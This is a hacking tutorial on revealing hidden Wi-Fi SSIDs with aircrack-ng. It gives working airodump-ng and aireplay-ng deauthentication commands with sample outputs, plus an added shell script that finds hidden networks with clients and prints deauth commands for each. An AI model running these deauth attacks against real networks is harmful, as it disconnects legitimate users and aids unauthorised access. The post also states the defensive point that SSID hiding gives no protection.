How To Hack: Find Hidden Wifi Hotspots

Known as security through obscurity, hiding the SSID so that the access point does not broadcast it in its beacons is something many people do. Just like MAC address filtering, this is a worthless form of protection. There is nothing secure about hiding your SSID: the name is still sent in clear text in every probe request, probe response and association request, so anyone who can hear a client join the network can read it. It is like the wizard hiding behind the curtain; it adds nothing to your security, only complication with no reward. Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first: put your wireless card into monitor mode (airmon-ng start wlan1; recent versions of aircrack-ng name the monitor interface wlan1mon) and start airodump-ng with the following command. Replace the interface with your own.

airodump-ng wlan1

The readout should be something like this.

CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

28:EF:01:34:64:91  -29       19        1    0   6  54e  WPA2 CCMP   PSK  linksys

28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length:  6>

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1

As you can see from the devices found, we have one with a hidden SSID. A hidden SSID is shown as <length:  x>, with x being the number of characters in the SSID (some access points advertise a length of 0, and older versions of airodump-ng do not show the number at all). Honestly, the length does not matter much to us. What we are interested in is the client attached to that access point, listed in the STATION column of the second table. All we have to do is de-authenticate that client; when it reconnects, it sends a probe request and an association request that name the SSID in the clear, and airodump-ng picks the name up from those frames. Let's run airodump-ng again, locked to the channel of the access point in question and filtering out everything else, with this command.

airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1

The switches are:

-c = channel of the target access point (this also stops airodump-ng hopping channels, which matters later for the deauth)
--bssid = MAC address of the target access point

This is what the airodump-ng readout should look like now.

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length:  6>

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1

Here we can see the target access point (BSSID) with one client attached (STATION). We now need to de-authenticate this client and watch for the SSID while it re-associates.

Now open a new terminal window and leave airodump-ng running.

Run this command in the new terminal.

aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1

The switches for this command are as follows:

-0 = attack mode 0 (deauthentication); 30 = number of deauth bursts to send (0 means keep sending until you stop it)
-a = MAC address of the target access point
-c = MAC address of the target client (leave it out and aireplay-ng broadcasts the deauth to every client of that access point)

Now switch back to the original terminal window that still has airodump-ng running.

This is what it should now look like.

CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  hacked

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 - 1      0        1  hacked

As you can see, we now know that the SSID of the target router is “hacked”. The name showed up twice: in the ESSID column once the access point answered the client, and in the client's Probes column, because the client asked for it by name.

If it does not work the first time, run aireplay-ng again until it does. Three things to check when it keeps failing: airodump-ng must be locked to the access point's channel with -c (a card that is hopping channels will miss the reconnect), your card must actually be able to inject (aireplay-ng -9 wlan1 tests this), and a client has to be present, since a hidden network with nobody connected gives us nothing to de-authenticate; in that case all you can do is wait for a client to show up and watch the Probes column. Keep in mind that the deauth frames knock the legitimate user offline for a moment each time you send them. The lesson for defenders is simple: hiding the SSID buys nothing, so put the effort into WPA2 with a strong passphrase instead.
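To tie the whole procedure together, here is an added shell example that is not part of the original post. It parses the CSV that airodump-ng writes when you add -w scan to the first command above (scan-01.csv), pulls out every hidden access point that has a client attached, and prints the channel-locked airodump-ng command and the matching aireplay-ng deauth for each one. The CSV in the script is constructed by hand to mirror airodump-ng's layout; it repeats the post's capture and adds a second hidden network with no clients and a station that is not associated with anything, so you can see both being skipped. The interface name wlan1mon, the file name and the burst count of 5 are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): find hidden-SSID targets in an
# airodump-ng CSV dump and print the aircrack-ng commands that reveal them.
# Assumption: airodump-ng was started with "-w scan", which writes scan-01.csv.

# Constructed sample in airodump-ng's CSV layout (access-point table, blank
# line, station table). It mirrors the post's capture plus two cases worth
# handling: a hidden AP with no clients and a station that is not associated.
write_sample_csv() {
  cat > "$1" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
28:EF:01:34:64:91, 2012-05-20 11:09:00, 2012-05-20 11:09:08,  6,  54, WPA2, CCMP, PSK, -29,       19,        1,   0.  0.  0.  0,   7, linksys, 
28:EF:01:35:34:85, 2012-05-20 11:09:00, 2012-05-20 11:09:08,  6,  54, WPA2, CCMP, PSK, -42,       17,        0,   0.  0.  0.  0,   6, , 
00:11:22:33:44:55, 2012-05-20 11:09:01, 2012-05-20 11:09:07, 11,  54, WPA2, CCMP, PSK, -61,        9,        0,   0.  0.  0.  0,   9, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
28:EF:01:23:45:67, 2012-05-20 11:09:00, 2012-05-20 11:09:08, -57,        1, 28:EF:01:35:34:85,
AA:BB:CC:DD:EE:FF, 2012-05-20 11:09:02, 2012-05-20 11:09:05, -70,        3, (not associated), linksys
EOF
}

# Print one "BSSID CHANNEL STATION" line per hidden access point that has a
# client attached. Hidden means an empty ESSID field with a non-zero ID-length.
# APs with no client are skipped: with nobody to deauth, nothing will reconnect.
# (Fields are split on ", ", so an ESSID containing a comma would confuse this.)
hidden_targets() {
  awk -F', *' '
    /^BSSID/       { section = "ap";  next }   # access-point table header
    /^Station MAC/ { section = "sta"; next }   # station table header
    NF < 5         { next }                    # blank separator lines
    section == "ap"  && $14 == "" && ($13 + 0) > 0 { chan[$1] = $4 + 0 }
    section == "sta" && ($6 in chan)                { print $6, chan[$6], $1 }
  ' "$1"
}

# Commands for one target: lock airodump-ng to the AP's channel and BSSID,
# then deauth that one client so it re-associates and names the SSID.
# $1 = AP BSSID, $2 = channel, $3 = client MAC, $4 = monitor-mode interface.
deauth_commands() {
  printf 'airodump-ng -c %s --bssid %s %s\n' "$2" "$1" "$4"
  printf 'aireplay-ng -0 5 -a %s -c %s %s\n' "$1" "$3" "$4"
}

# Print the full plan for every target in a CSV. Printing instead of executing
# keeps the example runnable offline; pipe the output to sh when you mean it.
plan_from_csv() {
  hidden_targets "$1" | while read -r bssid chan sta; do
    deauth_commands "$bssid" "$chan" "$sta" "$2"
  done
}

# Demo run on the constructed capture (the interface name wlan1mon is assumed).
csv=$(mktemp)
write_sample_csv "$csv"
plan_from_csv "$csv" wlan1mon
rm -f "$csv"
```

On the sample capture only the 28:EF:01:35:34:85 network qualifies, so the script prints exactly two lines: the locked airodump-ng command and the aireplay-ng deauth for its one client. The hidden network on channel 11 is left alone because nothing is connected to it, which is the situation where this technique simply has to wait.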
